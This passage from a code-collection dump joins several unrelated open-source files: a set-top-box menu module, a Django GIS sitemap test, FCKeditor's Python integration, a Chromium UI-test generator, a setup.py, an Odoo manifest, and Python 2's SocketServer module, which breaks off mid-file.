# check for arguments. they will be appended to the
# openDialog call
args = x.text or ""
screen += ", " + args
destList.append((_(item_text or "??"), boundFunction(self.runScreen, (module, screen)), entryID, weight))
return
elif x.tag == 'code':
destList.append((_(item_text or "??"), boundFunction(self.execText, x.text), entryID, weight))
return
elif x.tag == 'setup':
id = x.get("id")
if item_text == "":
item_text = _(getSetupTitle(id))
else:
item_text = _(item_text)
destList.append((item_text, boundFunction(self.openSetup, id), entryID, weight))
return
destList.append((item_text, self.nothing, entryID, weight))
def __init__(self, session, parent):
Screen.__init__(self, session)
list = []
menuID = None
for x in parent: #walk through the actual nodelist
if not x.tag:
continue
if x.tag == 'item':
item_level = int(x.get("level", 0))
if item_level <= config.usage.setup_level.index:
self.addItem(list, x)
count += 1
elif x.tag == 'menu':
self.addMenu(list, x)
count += 1
elif x.tag == "id":
menuID = x.get("val")
count = 0
if menuID is not None:
# menuupdater?
if menuupdater.updatedMenuAvailable(menuID):
for x in menuupdater.getUpdatedMenu(menuID):
if x[1] == count:
list.append((x[0], boundFunction(self.runScreen, (x[2], x[3] + ", ")), x[4]))
count += 1
if menuID is not None:
# plugins
for l in plugins.getPluginsForMenu(menuID):
# check if a plugin overrides an existing menu
plugin_menuid = l[2]
for x in list:
if x[2] == plugin_menuid:
list.remove(x)
break
list.append((l[0], boundFunction(l[1], self.session), l[2], l[3] or 50))
# for the skin: first try a menu_<menuID>, then Menu
self.skinName = [ ]
if menuID is not None:
self.skinName.append("menu_" + menuID)
self.skinName.append("Menu")
# Sort by Weight
if config.usage.sort_menus.getValue():
list.sort()
else:
list.sort(key=lambda x: int(x[3]))
self["menu"] = List(list)
self["actions"] = NumberActionMap(["OkCancelActions", "MenuActions", "NumberActions"],
{
"ok": self.okbuttonClick,
"cancel": self.closeNonRecursive,
"menu": self.closeRecursive,
"1": self.keyNumberGlobal,
"2": self.keyNumberGlobal,
"3": self.keyNumberGlobal,
"4": self.keyNumberGlobal,
"5": self.keyNumberGlobal,
"6": self.keyNumberGlobal,
"7": self.keyNumberGlobal,
"8": self.keyNumberGlobal,
"9": self.keyNumberGlobal
})
a = parent.get("title", "").encode("UTF-8") or None
a = a and _(a)
if a is None:
a = _(parent.get("text", "").encode("UTF-8"))
self["title"] = StaticText(a)
Screen.setTitle(self, a)
self.menu_title = a
def keyNumberGlobal(self, number):
print "menu keyNumber:", number
# Calculate index
number -= 1
if len(self["menu"].list) > number:
self["menu"].setIndex(number)
self.okbuttonClick()
def closeNonRecursive(self):
self.close(False)
def closeRecursive(self):
self.close(True)
def createSummary(self):
return MenuSummary
class MainMenu(Menu):
	"""The root menu of the application.

	The parsed menu.xml root node is handed straight to the Menu
	constructor; only the skin selection differs.
	"""
	def __init__(self, *args):
		# Pin the plain "Menu" skin before Menu.__init__ runs, which
		# would otherwise derive skinName from the menu id.
		self.skinName = "Menu"
		Menu.__init__(self, *args)
|
ghickman/django
|
refs/heads/master
|
tests/gis_tests/geoapp/sitemaps.py
|
452
|
from django.contrib.gis.sitemaps import KMLSitemap, KMZSitemap
from .models import City, Country
# Section name -> GeoDjango sitemap instance covering the two geo models.
sitemaps = {'kml': KMLSitemap([City, Country]),
            'kmz': KMZSitemap([City, Country]),
            }
|
CamilloBovio/Remote
|
refs/heads/master
|
modules/fckeditor/fckeditor/fckeditor.py
|
15
|
"""
FCKeditor - The text editor for Internet - http://www.fckeditor.net
Copyright (C) 2003-2010 Frederico Caldeira Knabben
== BEGIN LICENSE ==
Licensed under the terms of any of the following licenses at your
choice:
- GNU General Public License Version 2 or later (the "GPL")
http://www.gnu.org/licenses/gpl.html
- GNU Lesser General Public License Version 2.1 or later (the "LGPL")
http://www.gnu.org/licenses/lgpl.html
- Mozilla Public License Version 1.1 or later (the "MPL")
http://www.mozilla.org/MPL/MPL-1.1.html
== END LICENSE ==
This is the integration file for Python.
"""
import cgi
import os
import re
import string
def escape(text, replace=string.replace):
	"""Converts the special characters '<', '>', '&', '"' and "'".
	RFC 1866 specifies that these characters be represented
	in HTML as &lt; &gt; &amp; respectively. In Python
	1.5 we use the new string.replace() function for speed.
	"""
	# BUGFIX: the replacement strings must be the HTML entities; they had
	# been un-escaped into the bare characters, making every call a no-op.
	text = replace(text, '&', '&amp;') # must be done 1st
	text = replace(text, '<', '&lt;')
	text = replace(text, '>', '&gt;')
	text = replace(text, '"', '&quot;')
	text = replace(text, "'", '&#39;')
	return text
# The FCKeditor class
class FCKeditor(object):
	"""Server-side helper that renders an FCKeditor instance as HTML.

	Set the public attributes (Width, Height, Value, ToolbarSet, Config,
	BasePath) and call Create() to get the markup: an <iframe>-based
	editor for supported browsers, a plain <textarea> otherwise.
	"""
	def __init__(self, instanceName):
		self.InstanceName = instanceName	# form-field / DOM id prefix
		self.BasePath = '/fckeditor/'		# URL prefix of the editor files
		self.Width = '100%'			# CSS width: pixels or 'NN%'
		self.Height = '200'			# CSS height: pixels or 'NN%'
		self.ToolbarSet = 'Default'		# toolbar set name, or None
		self.Value = ''				# initial HTML content
		self.Config = {}			# extra editor config key/values
	def Create(self):
		"""Return the HTML fragment embedding this editor instance."""
		return self.CreateHtml()
	def CreateHtml(self):
		"""Build the editor markup (iframe, or textarea fallback)."""
		HtmlValue = escape(self.Value)
		Html = ""
		if (self.IsCompatible()):
			File = "fckeditor.html"
			Link = "%seditor/%s?InstanceName=%s" % (
				self.BasePath,
				File,
				self.InstanceName
				)
			if (self.ToolbarSet is not None):
				Link += "&Toolbar=%s" % self.ToolbarSet
			# Render the linked hidden field
			Html += "<input type=\"hidden\" id=\"%s\" name=\"%s\" value=\"%s\" style=\"display:none\" />" % (
				self.InstanceName,
				self.InstanceName,
				HtmlValue
				)
			# Render the configurations hidden field
			Html += "<input type=\"hidden\" id=\"%s___Config\" value=\"%s\" style=\"display:none\" />" % (
				self.InstanceName,
				self.GetConfigFieldString()
				)
			# Render the editor iframe.
			# BUGFIX: the editor JS looks the frame up by the id
			# "<InstanceName>___Frame"; the original emitted a literal
			# backslash ("%s\__Frame"), so the editor never initialised.
			Html += "<iframe id=\"%s___Frame\" src=\"%s\" width=\"%s\" height=\"%s\" frameborder=\"0\" scrolling=\"no\"></iframe>" % (
				self.InstanceName,
				Link,
				self.Width,
				self.Height
				)
		else:
			# BUGFIX: percentage sizes contain a single '%'; the original
			# searched for "%%" (never present), so "100%" became "100%px".
			if (self.Width.find("%") < 0):
				WidthCSS = "%spx" % self.Width
			else:
				WidthCSS = self.Width
			if (self.Height.find("%") < 0):
				HeightCSS = "%spx" % self.Height
			else:
				HeightCSS = self.Height
			Html += "<textarea name=\"%s\" rows=\"4\" cols=\"40\" style=\"width: %s; height: %s;\" wrap=\"virtual\">%s</textarea>" % (
				self.InstanceName,
				WidthCSS,
				HeightCSS,
				HtmlValue
				)
		return Html
	def IsCompatible(self):
		"""User-Agent sniff: True if the browser can host the editor."""
		# os.environ.get already covers the missing-key case; the old
		# has_key() check was redundant and Python 2 only.
		sAgent = os.environ.get("HTTP_USER_AGENT", "")
		if (sAgent.find("MSIE") >= 0) and (sAgent.find("mac") < 0) and (sAgent.find("Opera") < 0):
			i = sAgent.find("MSIE")
			iVersion = float(sAgent[i+5:i+5+3])
			return iVersion >= 5.5
		elif (sAgent.find("Gecko/") >= 0):
			i = sAgent.find("Gecko/")
			iVersion = int(sAgent[i+6:i+6+8])
			return iVersion >= 20030210
		elif (sAgent.find("Opera/") >= 0):
			i = sAgent.find("Opera/")
			iVersion = float(sAgent[i+6:i+6+4])
			return iVersion >= 9.5
		elif (sAgent.find("AppleWebKit/") >= 0):
			p = re.compile(r'AppleWebKit\/(\d+)', re.IGNORECASE)
			m = p.search(sAgent)
			# BUGFIX: compare the version *numerically*; on Python 2 the
			# original compared str to int, which is always True. Also
			# guard against a regex non-match.
			return m is not None and int(m.group(1)) >= 522
		else:
			return False
	def GetConfigFieldString(self):
		"""Serialise self.Config as an escaped query-string fragment."""
		sParams = ""
		bFirst = True
		for sKey in self.Config.keys():
			sValue = self.Config[sKey]
			if (not bFirst):
				sParams += "&"
			else:
				bFirst = False
			if (sValue):
				k = escape(sKey)
				v = escape(sValue)
				# "true"/"false" values are passed through unescaped.
				if (sValue == "true"):
					sParams += "%s=true" % k
				elif (sValue == "false"):
					sParams += "%s=false" % k
				else:
					sParams += "%s=%s" % (k, v)
		return sParams
|
timduru/platform-external-chromium_org
|
refs/heads/katkiss-4.4
|
chrome/tools/automated_ui_test_tools/ui_action_generator.py
|
52
|
#!/usr/bin/env python
# Copyright (c) 2011 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""A simple main function to print ui action sequences.
Action sequences are generated using chrome/test/functional/ui_model.py
and are output in the format required by automated_ui_tests build target.
Generate 100 command sequences to ui.txt:
ui_action_generator.py -o ui.txt -c 100
Generate 100 15-action-length sequences:
ui_action_generator.py -c 100 -a 15
Re-create command with seed 12345:
ui_action_generator.py -s 12345
"""
import optparse
import os
import sys
import xml.dom.minidom
def _AddTestPath():
"""Add chrome/test/functional to path to find script dependancies."""
script_dir = os.path.dirname(__file__)
chrome_dir = os.path.join(script_dir, os.pardir, os.pardir)
test_dir = os.path.join(chrome_dir, 'test', 'functional')
sys.path += [test_dir]
_AddTestPath()
import ui_model
def CreateUIActionList(actions_per_command, num_commands, given_seed=None):
  """Generate user-like pseudo-random action sequences.

  Args:
    actions_per_command: length of each ui action sequence.
    num_commands: number of sequences to generate.
    given_seed: optional rand seed shared by every generated command.

  Returns:
    XML format command list string, readable by automated_ui_tests.
  """
  doc = xml.dom.minidom.Document()
  root = doc.createElement('CommandList')
  doc.appendChild(root)
  for _ in xrange(num_commands):
    command_elem = doc.createElement('command')
    root.appendChild(command_elem)
    seed = ui_model.Seed(given_seed)
    command_elem.setAttribute('seed', str(seed))
    state = ui_model.BrowserState()
    for _ in xrange(actions_per_command):
      action = ui_model.GetRandomAction(state)
      state = ui_model.UpdateState(state, action)
      # Actions look like "name" or "name;url".
      name_and_url = action.split(';')
      action_elem = doc.createElement(name_and_url[0])
      if len(name_and_url) == 2:
        action_elem.setAttribute('url', name_and_url[1])
      command_elem.appendChild(action_elem)
  return doc.toprettyxml()
def ParseCommandLine():
  """Returns the list of options and their values, and unparsed args.
  """
  parser = optparse.OptionParser()
  # (flags, add_option keyword arguments) — declared as data, added in order.
  option_specs = [
      (('-o', '--output'),
       dict(dest='output_file', type='string', action='store',
            default='ui_actions.txt',
            help='the file to output the command list to')),
      (('-c', '--num_commands'),
       dict(dest='num_commands', type='int', action='store', default=1,
            help='number of commands to output')),
      (('-a', '--actions-per-command'),
       dict(dest='actions_per_command', type='int', action='store',
            default=25, help='number of actions per command')),
      (('-s', '--seed'),
       dict(dest='seed', type='int', action='store', default=None,
            help='generate action sequence using a seed')),
  ]
  for flags, kwargs in option_specs:
    parser.add_option(*flags, **kwargs)
  return parser.parse_args()
def main():
"""Generate command list and write it out in xml format.
For use as input for automated_ui_tests build target.
"""
options, args = ParseCommandLine()
command_list = CreateUIActionList(options.actions_per_command,
options.num_commands,
options.seed)
f = open(options.output_file, 'w')
f.write(command_list)
f.close()
print command_list
return 0
if __name__ == '__main__':
sys.exit(main())
|
finoptimal/fo_bdc
|
refs/heads/master
|
setup.py
|
1
|
from setuptools import setup, find_packages
from glob import glob
# Package metadata for fo_bdc, a wrapper around the Bill.com API.
setup(name='fo_bdc',
      version='1.0',
      description='Wrapper around Bill.com API',
      # Note that the tests folder can only be 1 level deep!!!
      scripts=glob('tests/*'),  # every file under tests/ installs as a script
      py_modules=[],
      packages=find_packages())
|
damiansoriano/odoo
|
refs/heads/master
|
addons/purchase_double_validation/__openerp__.py
|
62
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name' : 'Double Validation on Purchases',
'version' : '1.1',
'category': 'Purchase Management',
'images' : ['images/purchase_validation.jpeg'],
'depends' : ['base','purchase'],
'author' : 'OpenERP SA',
'description': """
Double-validation for purchases exceeding minimum amount.
=========================================================
This module modifies the purchase workflow in order to validate purchases that
exceeds minimum amount set by configuration wizard.
""",
'website': 'http://www.openerp.com',
'data': [
'purchase_double_validation_workflow.xml',
'purchase_double_validation_installer.xml',
'purchase_double_validation_view.xml',
],
'test': [
'test/purchase_double_validation_demo.yml',
'test/purchase_double_validation_test.yml'
],
'demo': [],
'installable': True,
'auto_install': False
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
mollstam/UnrealPy
|
refs/heads/master
|
UnrealPyEmbed/Source/Python/Lib/python27/SocketServer.py
|
33
|
"""Generic socket server classes.
This module tries to capture the various aspects of defining a server:
For socket-based servers:
- address family:
- AF_INET{,6}: IP (Internet Protocol) sockets (default)
- AF_UNIX: Unix domain sockets
- others, e.g. AF_DECNET are conceivable (see <socket.h>
- socket type:
- SOCK_STREAM (reliable stream, e.g. TCP)
- SOCK_DGRAM (datagrams, e.g. UDP)
For request-based servers (including socket-based):
- client address verification before further looking at the request
(This is actually a hook for any processing that needs to look
at the request before anything else, e.g. logging)
- how to handle multiple requests:
- synchronous (one request is handled at a time)
- forking (each request is handled by a new process)
- threading (each request is handled by a new thread)
The classes in this module favor the server type that is simplest to
write: a synchronous TCP/IP server. This is bad class design, but
save some typing. (There's also the issue that a deep class hierarchy
slows down method lookups.)
There are five classes in an inheritance diagram, four of which represent
synchronous servers of four types:
+------------+
| BaseServer |
+------------+
|
v
+-----------+ +------------------+
| TCPServer |------->| UnixStreamServer |
+-----------+ +------------------+
|
v
+-----------+ +--------------------+
| UDPServer |------->| UnixDatagramServer |
+-----------+ +--------------------+
Note that UnixDatagramServer derives from UDPServer, not from
UnixStreamServer -- the only difference between an IP and a Unix
stream server is the address family, which is simply repeated in both
unix server classes.
Forking and threading versions of each type of server can be created
using the ForkingMixIn and ThreadingMixIn mix-in classes. For
instance, a threading UDP server class is created as follows:
class ThreadingUDPServer(ThreadingMixIn, UDPServer): pass
The Mix-in class must come first, since it overrides a method defined
in UDPServer! Setting the various member variables also changes
the behavior of the underlying server mechanism.
To implement a service, you must derive a class from
BaseRequestHandler and redefine its handle() method. You can then run
various versions of the service by combining one of the server classes
with your request handler class.
The request handler class must be different for datagram or stream
services. This can be hidden by using the request handler
subclasses StreamRequestHandler or DatagramRequestHandler.
Of course, you still have to use your head!
For instance, it makes no sense to use a forking server if the service
contains state in memory that can be modified by requests (since the
modifications in the child process would never reach the initial state
kept in the parent process and passed to each child). In this case,
you can use a threading server, but you will probably have to use
locks to avoid two requests that come in nearly simultaneous to apply
conflicting changes to the server state.
On the other hand, if you are building e.g. an HTTP server, where all
data is stored externally (e.g. in the file system), a synchronous
class will essentially render the service "deaf" while one request is
being handled -- which may be for a very long time if a client is slow
to read all the data it has requested. Here a threading or forking
server is appropriate.
In some cases, it may be appropriate to process part of a request
synchronously, but to finish processing in a forked child depending on
the request data. This can be implemented by using a synchronous
server and doing an explicit fork in the request handler class
handle() method.
Another approach to handling multiple simultaneous requests in an
environment that supports neither threads nor fork (or where these are
too expensive or inappropriate for the service) is to maintain an
explicit table of partially finished requests and to use select() to
decide which request to work on next (or whether to handle a new
incoming request). This is particularly important for stream services
where each client can potentially be connected for a long time (if
threads or subprocesses cannot be used).
Future work:
- Standard classes for Sun RPC (which uses either UDP or TCP)
- Standard mix-in classes to implement various authentication
and encryption schemes
- Standard framework for select-based multiplexing
XXX Open problems:
- What to do with out-of-band data?
BaseServer:
- split generic "request" functionality out into BaseServer class.
Copyright (C) 2000 Luke Kenneth Casson Leighton <lkcl@samba.org>
example: read entries from a SQL database (requires overriding
get_request() to return a table entry from the database).
entry is processed by a RequestHandlerClass.
"""
# Author of the BaseServer patch: Luke Kenneth Casson Leighton
# XXX Warning!
# There is a test suite for this module, but it cannot be run by the
# standard regression test.
# To run it manually, run Lib/test/test_socketserver.py.
__version__ = "0.4"
import socket
import select
import sys
import os
import errno
try:
import threading
except ImportError:
import dummy_threading as threading
__all__ = ["TCPServer","UDPServer","ForkingUDPServer","ForkingTCPServer",
"ThreadingUDPServer","ThreadingTCPServer","BaseRequestHandler",
"StreamRequestHandler","DatagramRequestHandler",
"ThreadingMixIn", "ForkingMixIn"]
if hasattr(socket, "AF_UNIX"):
__all__.extend(["UnixStreamServer","UnixDatagramServer",
"ThreadingUnixStreamServer",
"ThreadingUnixDatagramServer"])
def _eintr_retry(func, *args):
"""restart a system call interrupted by EINTR"""
while True:
try:
return func(*args)
except (OSError, select.error) as e:
if e.args[0] != errno.EINTR:
raise
class BaseServer:
    """Base class for server classes.
    Methods for the caller:
    - __init__(server_address, RequestHandlerClass)
    - serve_forever(poll_interval=0.5)
    - shutdown()
    - handle_request() # if you do not use serve_forever()
    - fileno() -> int # for select()
    Methods that may be overridden:
    - server_bind()
    - server_activate()
    - get_request() -> request, client_address
    - handle_timeout()
    - verify_request(request, client_address)
    - server_close()
    - process_request(request, client_address)
    - shutdown_request(request)
    - close_request(request)
    - handle_error()
    Methods for derived classes:
    - finish_request(request, client_address)
    Class variables that may be overridden by derived classes or
    instances:
    - timeout
    - address_family
    - socket_type
    - allow_reuse_address
    Instance variables:
    - RequestHandlerClass
    - socket
    """
    # Seconds handle_request() will wait for an incoming request before
    # calling handle_timeout(); None blocks indefinitely.
    timeout = None
    def __init__(self, server_address, RequestHandlerClass):
        """Constructor. May be extended, do not override."""
        self.server_address = server_address
        self.RequestHandlerClass = RequestHandlerClass
        # Flag/event pair coordinating shutdown() (called from another
        # thread) with the serve_forever() polling loop below.
        self.__is_shut_down = threading.Event()
        self.__shutdown_request = False
    def server_activate(self):
        """Called by constructor to activate the server.
        May be overridden.
        """
        pass
    def serve_forever(self, poll_interval=0.5):
        """Handle one request at a time until shutdown.
        Polls for shutdown every poll_interval seconds. Ignores
        self.timeout. If you need to do periodic tasks, do them in
        another thread.
        """
        self.__is_shut_down.clear()
        try:
            while not self.__shutdown_request:
                # XXX: Consider using another file descriptor or
                # connecting to the socket to wake this up instead of
                # polling. Polling reduces our responsiveness to a
                # shutdown request and wastes cpu at all other times.
                r, w, e = _eintr_retry(select.select, [self], [], [],
                                       poll_interval)
                if self in r:
                    self._handle_request_noblock()
        finally:
            # Always reset the flag and signal waiters, even if the loop
            # exits via an exception, so shutdown() cannot hang forever.
            self.__shutdown_request = False
            self.__is_shut_down.set()
    def shutdown(self):
        """Stops the serve_forever loop.
        Blocks until the loop has finished. This must be called while
        serve_forever() is running in another thread, or it will
        deadlock.
        """
        self.__shutdown_request = True
        self.__is_shut_down.wait()
    # The distinction between handling, getting, processing and
    # finishing a request is fairly arbitrary. Remember:
    #
    # - handle_request() is the top-level call. It calls
    # select, get_request(), verify_request() and process_request()
    # - get_request() is different for stream or datagram sockets
    # - process_request() is the place that may fork a new process
    # or create a new thread to finish the request
    # - finish_request() instantiates the request handler class;
    # this constructor will handle the request all by itself
    def handle_request(self):
        """Handle one request, possibly blocking.
        Respects self.timeout.
        """
        # Support people who used socket.settimeout() to escape
        # handle_request before self.timeout was available.
        timeout = self.socket.gettimeout()
        if timeout is None:
            timeout = self.timeout
        elif self.timeout is not None:
            # Use the stricter (smaller) of the two timeouts.
            timeout = min(timeout, self.timeout)
        fd_sets = _eintr_retry(select.select, [self], [], [], timeout)
        if not fd_sets[0]:
            self.handle_timeout()
            return
        self._handle_request_noblock()
    def _handle_request_noblock(self):
        """Handle one request, without blocking.
        I assume that select.select has returned that the socket is
        readable before this function was called, so there should be
        no risk of blocking in get_request().
        """
        try:
            request, client_address = self.get_request()
        except socket.error:
            # e.g. client disconnected between select() and accept();
            # there is nothing to handle, so just return.
            return
        if self.verify_request(request, client_address):
            try:
                self.process_request(request, client_address)
            except:
                self.handle_error(request, client_address)
                self.shutdown_request(request)
    def handle_timeout(self):
        """Called if no new request arrives within self.timeout.
        Overridden by ForkingMixIn.
        """
        pass
    def verify_request(self, request, client_address):
        """Verify the request.  May be overridden.
        Return True if we should proceed with this request.
        """
        return True
    def process_request(self, request, client_address):
        """Call finish_request.
        Overridden by ForkingMixIn and ThreadingMixIn.
        """
        self.finish_request(request, client_address)
        self.shutdown_request(request)
    def server_close(self):
        """Called to clean-up the server.
        May be overridden.
        """
        pass
    def finish_request(self, request, client_address):
        """Finish one request by instantiating RequestHandlerClass."""
        self.RequestHandlerClass(request, client_address, self)
    def shutdown_request(self, request):
        """Called to shutdown and close an individual request."""
        self.close_request(request)
    def close_request(self, request):
        """Called to clean up an individual request."""
        pass
    def handle_error(self, request, client_address):
        """Handle an error gracefully.  May be overridden.
        The default is to print a traceback and continue.
        """
        print '-'*40
        print 'Exception happened during processing of request from',
        print client_address
        import traceback
        traceback.print_exc() # XXX But this goes to stderr!
        print '-'*40
class TCPServer(BaseServer):
    """Base class for various socket-based server classes.
    Defaults to synchronous IP stream (i.e., TCP).
    Methods for the caller:
    - __init__(server_address, RequestHandlerClass, bind_and_activate=True)
    - serve_forever(poll_interval=0.5)
    - shutdown()
    - handle_request() # if you don't use serve_forever()
    - fileno() -> int # for select()
    Methods that may be overridden:
    - server_bind()
    - server_activate()
    - get_request() -> request, client_address
    - handle_timeout()
    - verify_request(request, client_address)
    - process_request(request, client_address)
    - shutdown_request(request)
    - close_request(request)
    - handle_error()
    Methods for derived classes:
    - finish_request(request, client_address)
    Class variables that may be overridden by derived classes or
    instances:
    - timeout
    - address_family
    - socket_type
    - request_queue_size (only for stream sockets)
    - allow_reuse_address
    Instance variables:
    - server_address
    - RequestHandlerClass
    - socket
    """
    address_family = socket.AF_INET
    socket_type = socket.SOCK_STREAM
    request_queue_size = 5  # backlog passed to listen()
    allow_reuse_address = False  # set True for SO_REUSEADDR (fast rebinds)
    def __init__(self, server_address, RequestHandlerClass, bind_and_activate=True):
        """Constructor. May be extended, do not override."""
        BaseServer.__init__(self, server_address, RequestHandlerClass)
        self.socket = socket.socket(self.address_family,
                                    self.socket_type)
        if bind_and_activate:
            try:
                self.server_bind()
                self.server_activate()
            # Close the socket so the fd is not leaked if bind/listen failed.
            except:
                self.server_close()
                raise
    def server_bind(self):
        """Called by constructor to bind the socket.
        May be overridden.
        """
        if self.allow_reuse_address:
            self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.socket.bind(self.server_address)
        # Re-read the address: the kernel fills in ephemeral port/wildcards.
        self.server_address = self.socket.getsockname()
    def server_activate(self):
        """Called by constructor to activate the server.
        May be overridden.
        """
        self.socket.listen(self.request_queue_size)
    def server_close(self):
        """Called to clean-up the server.
        May be overridden.
        """
        self.socket.close()
    def fileno(self):
        """Return socket file number.
        Interface required by select().
        """
        return self.socket.fileno()
    def get_request(self):
        """Get the request and client address from the socket.
        May be overridden.
        """
        return self.socket.accept()
    def shutdown_request(self, request):
        """Called to shutdown and close an individual request."""
        try:
            #explicitly shutdown.  socket.close() merely releases
            #the socket and waits for GC to perform the actual close.
            request.shutdown(socket.SHUT_WR)
        except socket.error:
            pass #some platforms may raise ENOTCONN here
        self.close_request(request)
    def close_request(self, request):
        """Called to clean up an individual request."""
        request.close()
class UDPServer(TCPServer):
    """UDP server class."""
    allow_reuse_address = False
    socket_type = socket.SOCK_DGRAM
    # Largest datagram we will accept in one recvfrom() call.
    max_packet_size = 8192
    def get_request(self):
        # A single datagram is the whole request; hand back the payload
        # together with the server socket so the handler can reply.
        packet, sender = self.socket.recvfrom(self.max_packet_size)
        return (packet, self.socket), sender
    def server_activate(self):
        # Datagram sockets are connectionless: there is nothing to listen() on.
        pass
    def shutdown_request(self, request):
        # No connection to shut down; just delegate to close_request.
        self.close_request(request)
    def close_request(self, request):
        # The per-request "socket" is the server socket itself — never close it.
        pass
class ForkingMixIn:
    """Mix-in class to handle each request in a new process."""
    timeout = 300  # seconds of inactivity before handle_timeout() reaps zombies
    active_children = None  # set of live child pids; created lazily on first fork
    max_children = 40  # hard cap on concurrently forked children
    def collect_children(self):
        """Internal routine to wait for children that have exited."""
        if self.active_children is None:
            return
        # If we're above the max number of children, wait and reap them until
        # we go back below threshold. Note that we use waitpid(-1) below to be
        # able to collect children in size(<defunct children>) syscalls instead
        # of size(<children>): the downside is that this might reap children
        # which we didn't spawn, which is why we only resort to this when we're
        # above max_children.
        while len(self.active_children) >= self.max_children:
            try:
                pid, _ = os.waitpid(-1, 0)  # blocking wait for *any* child
                self.active_children.discard(pid)
            except OSError as e:
                if e.errno == errno.ECHILD:
                    # we don't have any children, we're done
                    self.active_children.clear()
                elif e.errno != errno.EINTR:
                    break
        # Now reap all defunct children.
        for pid in self.active_children.copy():
            try:
                pid, _ = os.waitpid(pid, os.WNOHANG)  # non-blocking poll
                # if the child hasn't exited yet, pid will be 0 and ignored by
                # discard() below
                self.active_children.discard(pid)
            except OSError as e:
                if e.errno == errno.ECHILD:
                    # someone else reaped it
                    self.active_children.discard(pid)
    def handle_timeout(self):
        """Wait for zombies after self.timeout seconds of inactivity.
        May be extended, do not override.
        """
        self.collect_children()
    def process_request(self, request, client_address):
        """Fork a new subprocess to process the request."""
        self.collect_children()
        pid = os.fork()
        if pid:
            # Parent process: remember the child and return to the accept loop.
            if self.active_children is None:
                self.active_children = set()
            self.active_children.add(pid)
            self.close_request(request) #close handle in parent process
            return
        else:
            # Child process.
            # This must never return, hence os._exit()!
            try:
                self.finish_request(request, client_address)
                self.shutdown_request(request)
                os._exit(0)
            except:
                try:
                    self.handle_error(request, client_address)
                    self.shutdown_request(request)
                finally:
                    # Exit with failure even if handle_error itself raised.
                    os._exit(1)
class ThreadingMixIn:
    """Mix-in class to handle each request in a new thread."""

    # Decides how worker threads act upon termination of the main
    # process: if True they are daemonic and will not keep it alive.
    daemon_threads = False

    def process_request_thread(self, request, client_address):
        """Same as in BaseServer but as a thread.

        In addition, exception handling is done here: handler errors are
        reported via handle_error(), and shutdown_request() is
        guaranteed to run exactly once on both the success and the error
        path.
        """
        try:
            self.finish_request(request, client_address)
        except Exception:
            # Only catch Exception (not KeyboardInterrupt/SystemExit):
            # the original bare ``except:`` also swallowed interpreter
            # exits and reported them as handler errors.
            self.handle_error(request, client_address)
        finally:
            # Single cleanup point instead of duplicating the call in
            # both branches as the original did.
            self.shutdown_request(request)

    def process_request(self, request, client_address):
        """Start a new thread to process the request."""
        t = threading.Thread(target=self.process_request_thread,
                             args=(request, client_address))
        t.daemon = self.daemon_threads
        t.start()
# Ready-made server classes: a concurrency mix-in combined with a
# transport. The mix-in must come first so its process_request()
# overrides the base server's.
class ForkingUDPServer(ForkingMixIn, UDPServer): pass
class ForkingTCPServer(ForkingMixIn, TCPServer): pass
class ThreadingUDPServer(ThreadingMixIn, UDPServer): pass
class ThreadingTCPServer(ThreadingMixIn, TCPServer): pass
# Unix-domain variants are only defined where the platform supports
# AF_UNIX sockets; they differ from their TCP/UDP bases only in the
# address family.
if hasattr(socket, 'AF_UNIX'):
    class UnixStreamServer(TCPServer):
        address_family = socket.AF_UNIX
    class UnixDatagramServer(UDPServer):
        address_family = socket.AF_UNIX
    class ThreadingUnixStreamServer(ThreadingMixIn, UnixStreamServer): pass
    class ThreadingUnixDatagramServer(ThreadingMixIn, UnixDatagramServer): pass
class BaseRequestHandler:
    """Base class for request handler classes.

    One instance is created per request. The constructor stores the
    request, the client address and the owning server on the instance,
    then drives the handler life cycle: setup() -> handle() -> finish(),
    with finish() guaranteed to run even if handle() raises.

    Subclasses implement a service by overriding handle(); inside it the
    request is available as self.request, the client address as
    self.client_address, and the server (for per-server state) as
    self.server. Because every request gets its own instance, handle()
    may freely define additional instance variables.
    """

    def __init__(self, request, client_address, server):
        self.request = request
        self.client_address = client_address
        self.server = server
        self.setup()
        try:
            self.handle()
        finally:
            self.finish()

    def setup(self):
        """Hook run before handle(); default does nothing."""
        pass

    def handle(self):
        """Service the request; default does nothing."""
        pass

    def finish(self):
        """Hook run after handle(), even on error; default does nothing."""
        pass
# The following two classes make it possible to use the same service
# class for stream or datagram servers.
# Each class sets up these instance variables:
# - rfile: a file object from which the request is read
# - wfile: a file object to which the reply is written
# When the handle() method returns, wfile is flushed properly
class StreamRequestHandler(BaseRequestHandler):
    """Define self.rfile and self.wfile for stream sockets."""

    # Default buffer sizes for rfile, wfile.
    # We default rfile to buffered because otherwise it could be
    # really slow for large data (a getc() call per byte); we make
    # wfile unbuffered because (a) often after a write() we want to
    # read and we need to flush the line; (b) big writes to unbuffered
    # files are typically optimized by stdio even when big reads
    # aren't.
    rbufsize = -1
    wbufsize = 0

    # A timeout to apply to the request socket, if not None.
    timeout = None

    # Disable nagle algorithm for this socket, if True.
    # Use only when wbufsize != 0, to avoid small packets.
    disable_nagle_algorithm = False

    def setup(self):
        """Wrap the connected socket in buffered rfile/wfile objects."""
        # self.request is the connected socket; keep a conventional alias.
        self.connection = self.request
        if self.timeout is not None:
            self.connection.settimeout(self.timeout)
        if self.disable_nagle_algorithm:
            self.connection.setsockopt(socket.IPPROTO_TCP,
                                       socket.TCP_NODELAY, True)
        self.rfile = self.connection.makefile('rb', self.rbufsize)
        self.wfile = self.connection.makefile('wb', self.wbufsize)

    def finish(self):
        """Flush buffered output, then release both file wrappers."""
        if not self.wfile.closed:
            try:
                self.wfile.flush()
            except socket.error:
                # A final socket error may have occurred here, such as
                # the local error ECONNABORTED.
                pass
